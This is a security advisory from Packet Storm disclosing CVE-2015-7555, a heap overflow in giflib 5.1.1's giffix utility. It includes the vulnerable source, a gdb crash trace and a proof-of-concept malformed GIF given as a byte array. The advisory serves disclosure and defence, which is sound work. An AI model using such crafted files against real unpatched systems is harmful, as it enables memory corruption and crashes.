exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

giflib 5.1.1 Heap Overflow

giflib 5.1.1 Heap Overflow
Posted Dec 22, 2015
Authored by Hans Jerry Illikainen

A heap overflow may occur in the giffix utility included in giflib-5.1.1 when processing records of the type IMAGE_DESC_RECORD_TYPE due to the allocated size of LineBuffer equaling the value of the logical screen width, GifFileIn->SWidth, while subsequently having GifFileIn->Image.Width bytes of data written to it.

tags | advisory, overflow
advisories | CVE-2015-7555
SHA-256 | 14b8a675aca0e489675c477775d6737f0d432c6edb938c10feaa6a0bb0c1e016

giflib 5.1.1 Heap Overflow

Change Mirror Download

About
=====

giflib[1] is a library for working with GIF images. It also provides
several command-line utilities.


CVE-2015-7555
=============

A heap overflow may occur in the giffix utility included in giflib-5.1.1
when processing records of the type `IMAGE_DESC_RECORD_TYPE' due to the
allocated size of `LineBuffer' equaling the value of the logical screen
width, `GifFileIn->SWidth', while subsequently having
`GifFileIn->Image.Width' bytes of data written to it.


giflib-5.1.1/util/giffix.c #35..194:
,----
| int main(int argc, char **argv)
| {
| [...]
| if ((LineBuffer = (GifRowType) malloc(GifFileIn->SWidth)) == NULL)
| GIF_EXIT("Failed to allocate memory required, aborted.");
|
| /* Scan the content of the GIF file and load the image(s) in: */
| do {
| [...]
| switch (RecordType) {
| case IMAGE_DESC_RECORD_TYPE:
| if (DGifGetImageDesc(GifFileIn) == GIF_ERROR)
| QuitGifError(GifFileIn, GifFileOut);
| [...]
| Width = GifFileIn->Image.Width;
| Height = GifFileIn->Image.Height;
| [...]
| /* Find the darkest color in color map to use as a filler. */
| ColorMap = (GifFileIn->Image.ColorMap ? GifFileIn->Image.ColorMap :
| GifFileIn->SColorMap);
| for (i = 0; i < ColorMap->ColorCount; i++) {
| j = ((int) ColorMap->Colors[i].Red) * 30 +
| ((int) ColorMap->Colors[i].Green) * 59 +
| ((int) ColorMap->Colors[i].Blue) * 11;
| if (j < ColorIntens) {
| ColorIntens = j;
| DarkestColor = i;
| }
| }
|
| /* Load the image, and dump it. */
| for (i = 0; i < Height; i++) {
| GifQprintf("\b\b\b\b%-4d", i);
| if (DGifGetLine(GifFileIn, LineBuffer, Width)
| == GIF_ERROR) break;
| if (EGifPutLine(GifFileOut, LineBuffer, Width)
| == GIF_ERROR) QuitGifError(GifFileIn, GifFileOut);
| }
|
| if (i < Height) {
| [...]
| /* Fill in with the darkest color in color map. */
| for (j = 0; j < Width; j++)
| LineBuffer[j] = DarkestColor;
| for (; i < Height; i++)
| if (EGifPutLine(GifFileOut, LineBuffer, Width)
| == GIF_ERROR) QuitGifError(GifFileIn, GifFileOut);
| }
| break;
| [...]
| }
| }
| while (RecordType != TERMINATE_RECORD_TYPE);
| [...]
| }
`----

,----
| $ gdb -q --args ./giffix heap.gif
| Reading symbols from ./giffix...done.
| (gdb) b util/giffix.c:94
| Breakpoint 1 at 0x401131: file giffix.c, line 94.
| (gdb) b util/giffix.c:148
| Breakpoint 2 at 0x401449: file giffix.c, line 148.
| (gdb) b util/giffix.c:149
| Breakpoint 3 at 0x401452: file giffix.c, line 149.
|
| (gdb) commands 3
| Type commands for breakpoint(s) 3, one per line.
| End with a line saying just "end".
| >printf "%p, 0x%02x\n", LineBuffer+j, DarkestColor
| >c
| >end
|
| (gdb) r
| [...]
| Breakpoint 1, main (argc=2, argv=0x7fffffffe6b8) at giffix.c:94
| 94 if ((LineBuffer = (GifRowType) malloc(GifFileIn->SWidth)) == NULL)
|
| (gdb) p GifFileIn->SWidth
| $1 = 1
|
| (gdb) c
| [...]
| Breakpoint 2, main (argc=2, argv=0x7fffffffe6b8) at giffix.c:148
| 148 for (j = 0; j < Width; j++)
|
| (gdb) p Width
| $2 = 255
|
| (gdb) c
| Continuing.
|
| Breakpoint 3, main (argc=2, argv=0x7fffffffe6b8) at giffix.c:149
| 149 LineBuffer[j] = DarkestColor;
| 0x618920, 0x01
|
| [...]
|
| Breakpoint 3, main (argc=2, argv=0x7fffffffe6b8) at giffix.c:149
| 149 LineBuffer[j] = DarkestColor;
| 0x618940, 0x01
|
| [...]
|
| Breakpoint 3, main (argc=2, argv=0x7fffffffe6b8) at giffix.c:149
| 149 LineBuffer[j] = DarkestColor;
| 0x618a1e, 0x01
|
| Program received signal SIGSEGV, Segmentation fault.
| 0x00007ffff7bd8658 in GifFreeMapObject (Object=0x101010101010101) at gifalloc.c:80
| 80 (void)free(Object->Colors);
`----


heap.gif:
,----
| unsigned char heap[] = {
| /* GIF87a */
| 0x47, 0x49, 0x46, 0x38, 0x37, 0x61,
|
| /* DGifGetScreenDesc() */
| 0x01, 0x00, /* GifFile->SWidth */
| 0x01, 0x00, /* GifFile->SHeight */
| 0x80, /* ColorCount = 1 << ((this & 0x07) + 1) */
| 0x00, /* GifFile->SBackGroundColor */
| 0x00, /* GifFile->AspectByte */
| 0x11, 0x11, 0x11, /* GifFile->SColorMap->Colors[0] */
| 0x00, 0x00, 0x00, /* GifFile->SColorMap->Colors[1] */
|
| /* DGifGetRecordType() */
| 0x2c, /* DESCRIPTOR_INTRODUCER */
|
| /* DGifGetImageDesc() */
| 0x00, 0x00, /* GifFile->Image.Left */
| 0x00, 0x00, /* GifFile->Image.Top */
| 0xff, 0x00, /* GifFile->Image.Width */
| 0x01, 0x00, /* GifFile->Image.Height */
| 0x00, /* BitsPerPixel = (this & 0x07) + 1 */
|
| /* DGifSetupDecompress() */
| 0x00, /* CodeSize */
|
| /* end of image data */
| 0x00,
|
| /* end of gif */
| 0x3b
| };
`----


Solution
========

No fix exists as of yet.



Footnotes
_________

[1] [http://giflib.sourceforge.net/]


Hans Jerry Illikainen
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close